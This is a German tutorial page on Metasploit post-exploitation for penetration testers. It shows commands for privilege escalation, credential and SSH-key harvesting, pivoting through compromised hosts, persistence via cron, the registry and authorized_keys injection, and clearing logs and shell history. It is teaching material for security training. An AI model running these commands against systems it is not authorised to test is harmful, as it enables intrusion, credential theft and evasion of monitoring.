Cyber Security Academy · Lektion

Post-Exploitation: Pivoting und Persistenz

Verwenden Sie die Post-Module von Metasploit zur Rechteausweitung, zum Auslesen von Zugangsdaten und zur Persistenz.

Lektion 4 von 413 Schritte

Post-Exploitation: Pivoting und Persistenz ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 4 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Ziele der Post-Exploitation

Nach dem ersten Zugriff verfolgt der Angreifer folgende Ziele: Berechtigungen erweitern, Informationen sammeln, dauerhaften Zugriff aufrechterhalten und sich lateral weiterbewegen, um das eigentliche Ziel zu erreichen (Daten, Systeme, Domänenkontrolle).

Situationsbewusstsein

Die ersten Schritte nach dem Öffnen einer Shell bestehen darin, sich einen Überblick über die Umgebung zu verschaffen. Sammeln Sie Systeminformationen, die Netzwerkkonfiguration, die Berechtigungen des aktuellen Benutzers, laufende Prozesse und Umgebungsvariablen.

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_system

Berechtigungserweiterung

Lokale Berechtigungserweiterung führt von einer Shell mit geringen Berechtigungen zu root/SYSTEM. Der local_exploit_suggester von Metasploit identifiziert passende Kernel- und lokale Exploits anhand der Betriebssystemversion des Ziels.

meterpreter > run post/multi/recon/local_exploit_suggester

# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > run

Anmeldedaten sammeln

Sammeln Sie Anmeldedaten: Passwort-Hashes, Klartext-Anmeldedaten in Konfigurationsdateien, gespeicherte Browserpasswörter und SSH-Schlüssel. Diese ermöglichen laterale Bewegungen und Persistenz.

meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds

# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/env

Pivoting: Port-Weiterleitung

Beim Pivoting wird ein kompromittierter Host als Brücke verwendet, um isolierte interne Netzwerke zu erreichen. Das portfwd-Modul von Metasploit erstellt lokale Port-Weiterleitungen über die Meterpreter-Sitzung.

# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20

# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u root

Routing über Sitzungen

Das route-Modul von Metasploit fügt Netzwerk-Routen über eine Sitzung hinzu. Dadurch können andere Module Netzwerke erreichen, die nur über den Pivot-Host zugänglich sind.

msf6 > route add 10.10.10.0/24 1   # route via session 1
msf6 > route print

# Now run modules targeting 10.10.10.x
# through session 1 as pivot

Pivoting über einen SOCKS-Proxy

Ein SOCKS-Proxy über Metasploit (oder chisel/ssh -D) ermöglicht es Ihnen, beliebige Werkzeuge mithilfe von proxychains über den Pivot zu routen. So können nmap, curl und Browser interne Netzwerke erreichen.

# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j

# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24

Persistenzmechanismen

Persistenz stellt sicher, dass der Zugriff Neustarts und den Verlust einer Sitzung überdauert. Häufige Methoden sind Cron-Jobs (Linux), Registry-Run-Schlüssel (Windows), das Einschleusen von SSH-authorized_keys und die Installation von Diensten.

# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence

# Windows: registry
meterpreter > run post/windows/manage/persistence_exe

# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Spuren verwischen

Angreifer löschen Protokolle, um unentdeckt zu bleiben. Sicherheitshinweis: Moderne SIEM- und EDR-Lösungen übertragen Protokolle in Echtzeit von den Hosts weg – das Löschen lokaler Protokolle entfernt keine zentralisierten Aufzeichnungen.

meterpreter > clearev          # clear Windows event logs

# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_history

Post-Exploitation-Module

Metasploit enthält Hunderte von Post-Modulen für Windows und Linux: zum Sammeln von Anmeldedaten, für Browserdaten, Keylogging, Screenshot-Erstellung und Netzwerk-Enumeration.

msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > run

Wissen, wann Schluss ist

Beenden Sie autorisierte Penetrationstests, sobald Sie das vereinbarte Ziel des Prüfungsumfangs erreicht haben oder auf Daten stoßen, auf die Sie nicht zugreifen dürfen. Dokumentieren Sie Ihren Weg sorgfältig – dies ist die Angriffskette, über die Sie berichten.

Kurzer Test

Was ermöglicht der Metasploit-Befehl "route add"?

Zusammenfassung: Post-Exploitation

Die Post-Exploitation baut auf dem ersten Zugriff auf, um tatsächliche Auswirkungen zu erzielen: Berechtigungserweiterung, das Sammeln von Anmeldedaten, laterale Bewegungen und Persistenz. Metasploit stellt für jede Phase Post-Module bereit. Dokumentieren Sie jeden Schritt – die Angriffskette vom Einstieg bis zum Ziel ist das zentrale Ergebnis eines Penetrationstests.

Kostenlos starten

Lerne Cyber Security Academy mit einem KI-Tutor — kostenlos

Schreibe und führe echten Code in deinem Browser aus, bekomme sofortige Hilfe von einem 24/7 KI-Tutor und setze dein Lernen im Web oder in der App fort.

Kurse
76
Lektionen
303

Häufig gestellte Fragen

Ist die Lektion „Post-Exploitation: Pivoting und Persistenz“ kostenlos?

Ja — der vollständige Text von „Post-Exploitation: Pivoting und Persistenz“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Post-Exploitation: Pivoting und Persistenz“?

Verwenden Sie die Post-Module von Metasploit zur Rechteausweitung, zum Auslesen von Zugangsdaten und zur Persistenz. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Cyber Security Academy zu starten?

Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 4 von 4.

Wie lange dauert die Lektion „Post-Exploitation: Pivoting und Persistenz“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?

Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Metasploit-Architektur und msfconsole
  2. Eine bekannte Schwachstelle ausnutzen
  3. Payloads: Staged vs. Stageless und Meterpreter
  4. Post-Exploitation: Pivoting und Persistenz
← Zurück zu Cyber Security Academy